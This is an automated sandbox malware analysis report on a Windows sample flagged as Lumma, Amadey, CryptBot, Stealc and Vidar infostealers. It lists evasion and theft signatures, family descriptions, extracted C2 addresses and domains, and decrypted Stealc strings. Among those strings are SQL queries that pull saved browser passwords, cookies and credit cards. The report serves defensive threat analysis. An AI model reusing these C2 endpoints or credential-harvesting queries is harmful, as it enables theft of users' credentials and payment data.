Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546540
MD5: 08fa512abc42a3d5f8ba6ad72f5c550e
SHA1: 6b38e59bc4dfdebe5396700e918b96fc22a07611
SHA256: d573c7e78c05a4d3a653269e00635a56516fefa23a8485a29fdecf75ef5b5e18
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Yara detected Amadeys stealer DLL
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to start a terminal service
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Drops large PE files
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe Avira: detection malicious, Label: HEUR/AGEN.1313486
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Avira: detection malicious, Label: TR/AD.Stealc.cucnc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Avira: detection malicious, Label: TR/AD.Stealc.cucnc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 17.2.stealc_default2.exe.770000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: 17.2.stealc_default2.exe.770000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: RDX123456.exe.5292.48.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["computeryrati.site", "faulteyotk.site", "contemteny.site", "authorisev.site", "servicedny.site", "goalyfeastz.site", "opposezmny.site", "seallysl.site", "dilemmadu.site"], "Build id": "4SD0y4--RLREBORN"}
Source: Offnewhere.exe.7260.18.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["sevjoi17sr.top", "home.sevjoi17sr.top", "0/80/home.sevjoi17sr.top"]}
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpro Virustotal: Detection: 18% Perma Link
Source: C:\ProgramData\LgAmARwZ\Application.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Offnewhere[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exe ReversingLabs: Detection: 36%
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe Virustotal: Detection: 47% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\LgAmARwZ\Application.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\GOLD1234[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: 01
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: 03
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: 20
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: 25
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetProcAddress
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: LoadLibraryA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: lstrcatA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: OpenEventA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CreateEventA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CloseHandle
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Sleep
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetUserDefaultLangID
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: VirtualAllocExNuma
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: VirtualFree
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetSystemInfo
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: VirtualAlloc
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: HeapAlloc
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetComputerNameA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: lstrcpyA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetProcessHeap
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetCurrentProcess
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: lstrlenA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ExitProcess
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetSystemTime
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SystemTimeToFileTime
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: advapi32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: gdi32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: user32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: crypt32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ntdll.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetUserNameA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CreateDCA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetDeviceCaps
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ReleaseDC
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CryptStringToBinaryA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sscanf
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: VMwareVMware
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: HAL9TH
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: JohnDoe
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: DISPLAY
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %hu/%hu/%hu
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: http://185.215.113.17
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: 00x00
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: !|
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: /2fb6c2cc8dce150a.php
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: /f1ddeb6592c03206/
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: default_valenciga
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetFileAttributesA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GlobalLock
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: HeapFree
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetFileSize
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GlobalSize
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: IsWow64Process
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Process32Next
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetLocalTime
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: FreeLibrary
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetTimeZoneInformation
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetSystemPowerStatus
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetVolumeInformationA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Process32First
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetLocaleInfoA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetModuleFileNameA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: DeleteFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: FindNextFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: LocalFree
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: FindClose
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: LocalAlloc
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetFileSizeEx
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ReadFile
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SetFilePointer
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: WriteFile
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CreateFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: FindFirstFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CopyFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: VirtualProtect
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetLastError
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: lstrcpynA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: MultiByteToWideChar
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GlobalFree
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: WideCharToMultiByte
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GlobalAlloc
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: OpenProcess
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: TerminateProcess
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetCurrentProcessId
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: gdiplus.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ole32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: bcrypt.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: wininet.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: shlwapi.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: shell32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: psapi.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: rstrtmgr.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SelectObject
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: BitBlt
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: DeleteObject
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CreateCompatibleDC
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GdipGetImageEncoders
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GdiplusStartup
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GdiplusShutdown
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GdipSaveImageToStream
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GdipDisposeImage
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GdipFree
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetHGlobalFromStream
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CoUninitialize
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CoInitialize
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CoCreateInstance
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: BCryptDecrypt
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: BCryptSetProperty
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: BCryptDestroyKey
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetWindowRect
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetDesktopWindow
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetDC
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CloseWindow
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: wsprintfA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CharToOemW
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: wsprintfW
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: RegQueryValueExA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: RegEnumKeyExA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: RegOpenKeyExA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: RegCloseKey
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: RegEnumValueA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CryptBinaryToStringA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CryptUnprotectData
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SHGetFolderPathA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ShellExecuteExA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: InternetOpenUrlA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: InternetConnectA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: InternetCloseHandle
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: InternetOpenA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: HttpSendRequestA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: HttpOpenRequestA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: InternetReadFile
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: InternetCrackUrlA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: StrCmpCA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: StrStrA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: StrCmpCW
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: PathMatchSpecA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: GetModuleFileNameExA
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: RmStartSession
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: RmRegisterResources
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: RmGetList
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: RmEndSession
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sqlite3_open
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sqlite3_step
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sqlite3_column_text
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sqlite3_finalize
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sqlite3_close
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sqlite3_column_bytes
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sqlite3_column_blob
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: encrypted_key
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: PATH
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: NSS_Init
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: NSS_Shutdown
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: PK11_FreeSlot
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: PK11_Authenticate
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: C:\ProgramData\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: browser:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: profile:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: url:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: login:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: password:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Opera
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: OperaGX
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Network
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: cookies
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: .txt
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: TRUE
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: FALSE
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: autofill
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: history
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: cc
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: name:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: month:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: year:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: card:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Cookies
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Login Data
